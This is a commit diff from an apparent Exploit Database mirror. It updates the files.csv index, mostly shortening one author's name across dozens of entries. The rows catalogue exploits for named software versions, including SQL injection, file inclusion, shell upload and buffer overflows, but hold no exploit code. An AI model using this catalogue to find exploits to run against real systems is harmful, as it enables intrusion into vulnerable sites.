bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_19_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-19 04:30:00 +00:00
parent 21ed45f856
commit 9e169eb898
18 changed files with 967 additions and 182 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

381
files.csv
View file

@ -9844,7 +9844,7 @@ id,file,description,date,author,platform,type,port
10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0
10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0
10610,platforms/linux/remote/10610.rb,"CoreHTTP Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,"indoushka salah el ddine",php,webapps,0
10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,indoushka,php,webapps,0
10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0
10613,platforms/linux/local/10613.c,"2.6.18-20 2009 Local Root Exploit",2009-12-23,DigitALL,linux,local,0
10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery Directory Traversal Vulnerability",2009-12-23,Mr.tro0oqy,php,webapps,0
@ -9875,68 +9875,68 @@ id,file,description,date,author,platform,type,port
10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0
10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10655,platforms/php/webapps/10655.txt,"Best Top List Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,indoushka,php,webapps,0
10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
10655,platforms/php/webapps/10655.txt,"Best Top List Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace SQL Injection Vulnerability",2009-12-25,"AnGrY BoY",php,webapps,0
10658,platforms/php/webapps/10658.txt,"caricatier 2.5 Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10660,platforms/php/webapps/10660.txt,"barbo91 uploads Upload Shell Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0
10658,platforms/php/webapps/10658.txt,"caricatier 2.5 Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
10660,platforms/php/webapps/10660.txt,"barbo91 uploads Upload Shell Vulnerability",2009-12-25,indoushka,php,webapps,0
10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit",2009-12-25,"Encrypt3d.M!nd ",windows,local,0
10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0
10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0
10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10671,platforms/php/webapps/10671.txt,"Info Fisier 1.0 - Remote File Upload Vulnerability",2009-12-26,"wlhaan hacker",php,webapps,0
10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10675,platforms/php/webapps/10675.txt,"Webring - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10679,platforms/php/webapps/10679.txt,"Quiz - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10680,platforms/php/webapps/10680.txt,"E-Pay RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10682,platforms/php/webapps/10682.txt,"Dros RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10683,platforms/php/webapps/10683.txt,"TomatoCart - Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10684,platforms/php/webapps/10684.txt,"Upload-Point 1.6 Beta - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10685,platforms/php/webapps/10685.txt,"Best Top List 2.11 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup Vulnerability",2009-12-26,indoushka,php,webapps,0
10675,platforms/php/webapps/10675.txt,"Webring - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass Vulnerability",2009-12-26,indoushka,php,webapps,0
10679,platforms/php/webapps/10679.txt,"Quiz - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10680,platforms/php/webapps/10680.txt,"E-Pay RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10682,platforms/php/webapps/10682.txt,"Dros RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10683,platforms/php/webapps/10683.txt,"TomatoCart - Backup Vulnerability",2009-12-26,indoushka,php,webapps,0
10684,platforms/php/webapps/10684.txt,"Upload-Point 1.6 Beta - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10685,platforms/php/webapps/10685.txt,"Best Top List 2.11 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10686,platforms/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0
10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10688,platforms/php/webapps/10688.txt,"FlatPress Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10689,platforms/php/webapps/10689.txt,"file upload Ar Version - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10690,platforms/php/webapps/10690.txt,"IMG2ASCII - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10694,platforms/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10695,platforms/php/webapps/10695.txt,"Lizard Cart Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10696,platforms/php/webapps/10696.txt,"epay Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10697,platforms/php/webapps/10697.txt,"e-pay 1.55 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10698,platforms/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,"indoushka salah el ddine",php,webapps,0
10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia Insecure Cookie Handling Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10700,platforms/php/webapps/10700.txt,"Image File Upload Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10703,platforms/php/webapps/10703.txt,"kooora 3.0 - AR Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10704,platforms/php/webapps/10704.txt,"Mega Upload Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10705,platforms/php/webapps/10705.txt,"Gallery 2.3 - RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10706,platforms/php/webapps/10706.txt,"MyCart shopping cart Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10707,platforms/php/webapps/10707.txt,"oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10688,platforms/php/webapps/10688.txt,"FlatPress Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10689,platforms/php/webapps/10689.txt,"file upload Ar Version - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10690,platforms/php/webapps/10690.txt,"IMG2ASCII - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10694,platforms/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10695,platforms/php/webapps/10695.txt,"Lizard Cart Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10696,platforms/php/webapps/10696.txt,"epay Backup Vulnerability",2009-12-26,indoushka,php,webapps,0
10697,platforms/php/webapps/10697.txt,"e-pay 1.55 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10698,platforms/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,indoushka,php,webapps,0
10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia Insecure Cookie Handling Vulnerability",2009-12-26,indoushka,php,webapps,0
10700,platforms/php/webapps/10700.txt,"Image File Upload Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10703,platforms/php/webapps/10703.txt,"kooora 3.0 - AR Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10704,platforms/php/webapps/10704.txt,"Mega Upload Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10705,platforms/php/webapps/10705.txt,"Gallery 2.3 - RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10706,platforms/php/webapps/10706.txt,"MyCart shopping cart Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10707,platforms/php/webapps/10707.txt,"oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability",2009-12-26,indoushka,php,webapps,0
10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10710,platforms/php/webapps/10710.txt,"Green Desktiny - Customer Support Helpdesk SQL injection vulnerability",2009-12-26,kaMtiEz,php,webapps,0
10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0
10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555
10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0
10717,platforms/php/webapps/10717.txt,"DBHCMS - Web Content Management System 1.1.4 - RFI Vulnerability",2009-12-26,Gamoscu,php,webapps,0
10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0
10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0
10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
10725,platforms/php/webapps/10725.txt,"Nuke Remote SQL Injection Vulnerability",2009-12-27,FormatXformat,php,webapps,0
10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection Vulnerability",2009-12-27,"AnGrY BoY",php,webapps,0
10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Remote File Upload Vulnerability",2009-12-27,Phenom,php,webapps,0
@ -9955,15 +9955,15 @@ id,file,description,date,author,platform,type,port
10740,platforms/php/webapps/10740.txt,"Joomla Component com_trabalhe_conosco Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0
10741,platforms/php/webapps/10741.txt,"cybershade cms 0.2 - Remote File Inclusion Vulnerability",2009-12-27,Mr.SeCreT,php,webapps,0
10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum SQL Injection Vulnerability",2009-12-27,"ViRuSMaN ",php,webapps,0
10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0
10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup Vulnerability",2009-12-26,indoushka,php,webapps,0
10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta)",2009-12-27,dijital1,windows,local,0
10745,platforms/windows/local/10745.c,"Mini-stream ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0
10747,platforms/windows/local/10747.py,"Mini-Stream Exploit for Windows XP SP2 and SP3",2009-12-27,dijital1,windows,local,0
10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Meta)",2009-12-27,dijital1,windows,local,0
10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0
10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload Vulnerability",2009-12-28,"indoushka salah el ddine",multiple,webapps,80
10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Upload shell Vulnerability",2009-12-28,"indoushka salah el ddine",multiple,webapps,80
10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload Vulnerability",2009-12-28,indoushka,multiple,webapps,80
10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Upload shell Vulnerability",2009-12-28,indoushka,multiple,webapps,80
10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus Remote File Include",2009-12-28,FL0RiX,multiple,webapps,80
10755,platforms/linux/webapps/10755.txt,"egegen turkish script SQL Injection Vulnerability",2009-12-28,FormatXformat,linux,webapps,80
10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Upload Shell Vulnerability",2009-12-28,FormatXformat,linux,webapps,80
@ -9974,19 +9974,19 @@ id,file,description,date,author,platform,type,port
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10775,platforms/asp/webapps/10775.txt,"Uguestbook DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10775,platforms/asp/webapps/10775.txt,"Uguestbook DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability",2009-12-29,SecurityRules,php,webapps,0
10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0
10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,"indoushka salah el ddine",php,webapps,0
10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,indoushka,php,webapps,0
10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BOF (Perl)",2009-12-29,jacky,windows,local,0
10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0
10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal BOF (Python)",2009-12-29,jacky,windows,local,0
@ -10001,20 +10001,20 @@ id,file,description,date,author,platform,type,port
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10796,platforms/asp/webapps/10796.txt,"ezscheduler Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow Exploit",2009-12-30,mr_me,windows,local,0
10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Upload Shell Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - RFI Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,"indoushka salah el ddine",php,webapps,0
10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup Vulnerability",2009-12-30,indoushka,php,webapps,0
10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload Vulnerability",2009-12-30,indoushka,php,webapps,0
10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Upload Shell Vulnerability",2009-12-30,indoushka,php,webapps,0
10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - RFI Vulnerability",2009-12-30,indoushka,php,webapps,0
10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0
10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - XSS Vulnerability",2009-12-30,MaXe,php,webapps,0
10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability",2009-12-30,Palyo34,php,webapps,0
10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio LFI",2009-12-30,bonobug,php,webapps,0
10809,platforms/php/webapps/10809.txt,"I-Escorts Directory (country_escorts.php country_id) SQL Injection Vulnerability",2009-12-30,R3d-D3V!L,php,webapps,0
10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10811,platforms/php/webapps/10811.txt,"Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info Vulnerability",2009-12-30,indoushka,php,webapps,0
10811,platforms/php/webapps/10811.txt,"Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability",2009-12-30,indoushka,php,webapps,0
10812,platforms/php/webapps/10812.txt,"WHOISCART Scripting Vulnerability",2009-12-30,HAQIQ20,php,webapps,0
10813,platforms/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross Site Scripting Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross Site Scripting Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0
10813,platforms/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross Site Scripting Vulnerability",2009-12-30,indoushka,php,webapps,0
10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross Site Scripting Vulnerability",2009-12-30,indoushka,php,webapps,0
10817,platforms/php/webapps/10817.txt,"Joomla Component com_airmonoblock Blind SQL Injection Vulnerability",2009-12-30,Pyske,php,webapps,0
10819,platforms/asp/webapps/10819.txt,"gallery_show.asp GID suffer from Blind SQL Injection Vulnerability",2009-12-30,R3d-D3V!L,asp,webapps,0
10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DoS (0day)",2009-12-31,emgent,php,dos,80
@ -10045,7 +10045,7 @@ id,file,description,date,author,platform,type,port
10846,platforms/php/webapps/10846.txt,"Weatimages Directory Traversal and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0
10847,platforms/php/webapps/10847.txt,"Joomla Component com_mdigg SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0
10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection Vulnerability",2009-12-31,bnc,php,webapps,0
10861,platforms/php/webapps/10861.txt,"Discuz <= 1.03 SQL Injection Exploit Vulnerability",2009-12-31,"indoushka salah el ddine",php,webapps,0
10861,platforms/php/webapps/10861.txt,"Discuz <= 1.03 SQL Injection Exploit Vulnerability",2009-12-31,indoushka,php,webapps,0
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 (lng) LFI Vulnerability",2009-12-31,cOndemned,php,webapps,0
10870,platforms/multiple/dos/10870.html,"Opera 10.10 Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos,0
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games (Auth Bypass) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
@ -10054,7 +10054,7 @@ id,file,description,date,author,platform,type,port
